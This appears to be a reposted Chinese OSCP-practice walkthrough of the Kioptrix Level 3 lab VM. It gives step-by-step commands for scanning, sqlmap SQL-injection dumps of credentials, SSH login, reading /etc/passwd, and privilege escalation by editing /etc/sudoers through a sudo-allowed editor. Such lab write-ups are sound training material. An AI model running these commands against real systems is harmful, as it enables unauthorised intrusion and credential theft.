当前位置: 首页 > ops >正文

OSCP备战-kioptrixvm3详细解法

探测IP

arp-scan -l


得出目标IP:192.168.155.165
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24


也可以使用

nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

sudo nano /etc/hosts


添加一行如图所示:

192.168.155.165 kioptrix3.com


按下ctrl+x保存退出

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT
Nmap scan report for 192.168.155.165
Host is up (0.0050s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with 

80端口

访问一下


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.165 -e *


访问一下试试:
192.168.155.165/phpmyadmin/index.php 


尝试无密码登录:admin
进入后台


no privileges提示我们没有权限,显示即为一个虚拟数据库
尝试爆破了一下,没出结果
回到主页,能点的都点一下
博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的


点击login又是一个登录框


最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点
如图:


明显跟之前的页面不一样,在那dirsearch扫一下

dirsearch -u http://kioptrix3.com/gallery -e *


访问得到:


Gallarific 2.1 - Free Version released October 10, 2009
搜一下searchsploit Gallarific


有一个注入漏洞的

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch


数据库:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs


现在连接的数据库:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db


DBMS用户:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user


发现是root用户
表:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables


字段:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns


值:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump


得到登录结果:
admin/n0t7t1k4
如此尝试,发现在dev_accounts中,得到了两组用户名和密码


尝试进行连接,只有后两组密码可以连接

ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165 


查看查看:

cat /etc/passwd


列出当前用户家目录下的所有文件和文件夹:

ls -al


读取文件:

cat CompanyPolicy.README


查看权限:

sudo -l


根据提示执行:

sudo /usr/local/bin/ht


报错
执行命令:

echo $TERM
export TERM=xterm
echo $TERM


重新执行

sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers


回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。
修改配置添加一行

loneferret ALL=(ALL) ALL


F2保存,ctral+c退出
执行命令

sudo /bin/bash

成功

http://www.xdnf.cn/news/5427.html

相关文章:

  • [Java实战]Spring Boot 中Starter机制与自定义Starter实战(九)
  • Linux为啥会重新设置中断请求号与中断向量号之间的关系?
  • vector--OJ1
  • 【外网下载Jar包】
  • AI技术驱动SEO关键词智能布局
  • go程序编译成动态库,使用c进行调用
  • linux--------------Ext系列⽂件系统(下)
  • QOwnNotes:功能强大的跨平台笔记应用程序
  • FreeRTOS静态任务的创建、删除和软件定时器的开启(尚硅谷学习笔记)
  • 监控易一体化运维:任务计划管理的关键作用
  • 王道计算机网络知识点总结
  • 动态路由实现原理及前端控制与后端控制的核心差异
  • Linux:43线程封装与互斥lesson31
  • 前端Web开发HTML5+CSS3+移动web(基础-flex)
  • 基于Python的网络电子书阅读系统
  • 在Python中计算函数耗时并超时自动退出
  • 英语听力口语词汇--2.宣传类
  • 【时时三省】(C语言基础)字符数组
  • 关于TIAV20 PLCSIM仿真错误的原因
  • java中的io流
  • 专题一:汉诺塔问题:递归算法的精妙解析
  • PyGame游戏开发(含源码+演示视频+开结题报告+设计文档)
  • 【LwIP源码学习6】UDP部分源码分析
  • [思维模式-28]:《本质思考力》-8- 两种相反的构建与解构系统的思维模式:①自顶向下的分解、牵引;②自底向上的堆叠、聚合
  • 深入剖析 MyBatis 位运算查询:从原理到最佳实践
  • AI文字识别工具汇总
  • 控制LED灯设备
  • Linux epoll 详解:概念、使用、数据结构、流程及应用
  • C++:友元
  • CSS 基础知识分享:从入门到注意事项